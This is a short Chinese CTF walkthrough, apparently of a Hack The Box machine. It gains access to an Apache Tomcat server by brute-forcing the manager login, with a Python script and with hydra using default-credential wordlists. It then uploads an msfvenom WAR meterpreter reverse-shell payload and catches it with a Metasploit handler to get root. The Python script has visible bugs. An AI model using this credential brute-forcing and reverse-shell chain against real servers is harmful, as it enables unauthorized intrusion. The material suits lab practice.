info enum
| 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
Apache Tomcat/7.0.88
|
apache登陆,以前遇到过
当时采取的方式是,通过python脚本,将字典处理为“admin:admin”类似的形式,然后再编码一次。
方(偷)便(懒)起见,用burp intruder模块爆破。
缺点:如果字典过大,burp总是会卡死==
现在又遇到了apache认证,观察以下数据包。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
| GET /manager/html HTTP/1.1
Host: 10.10.10.95:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://10.10.10.95:8080/
Connection: close
Upgrade-Insecure-Requests: 1
Authorization: Basic MTIzMTIzOjMyMTIz
|
暴力破解脚本
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
| import base64
import requests
url = "http://10.10.10.95:8080/manager/html"
S = requests.Session()
user = open("/usr/share/wordlists/tomcat-betterdefaultpasslist.txt","r")
for each in user.readlines():
key = base64.b64encode(each)
what_the_fuck_pass = "Basic "+key
headers={ 'Host': '10.10.10.95:8080',\
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',\
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\
'Accept-Language': 'en-US,en;q=0.5',\
'Referer': 'http://10.10.10.95:8080/',\
'Connection': 'close',\
'Upgrade-Insecure-Requests': '1',\
'Authorization': what_the_fuck_pass
}
send_pass = S.get(url,headers=headers)
if send_pass.status_code == '200':
print key
break
else:
print key+"--error"
user.close()
|
hydra
| apt search seclists
apt-get install seclists
cd /usr/share/seclists/
find . | grep -i tomcat
hydra -C Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt http-get://10.10.10.95:8080/manager/html
|
获得弱密码,就可以登陆服务器
上传命令执行脚本
曾经做过war类型文件上传,获取shell
war file是打包好的java代码。select war file to upload
用msfvenom生成war payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=kali-ip LPORT=9001 -f war -o xx.war
msfvenom
它用于生成payload。参考资料
msfvenom -l payload 查看所有攻击载荷
msfvenom -l formats
获取shell
| msfconsole
use exploit/multi/handler/
set payload /x64//reverse_tcp
set LHOST tun0 设置监听的网卡/端口
set
exploit
|
当上传成功xx.war,就可以访问以下地址,获得一个shell。
http://target.com:8080/xx/krnlxctxgebr.jsp
| sessions -i 1
getuid
shell
已经获得root权限
|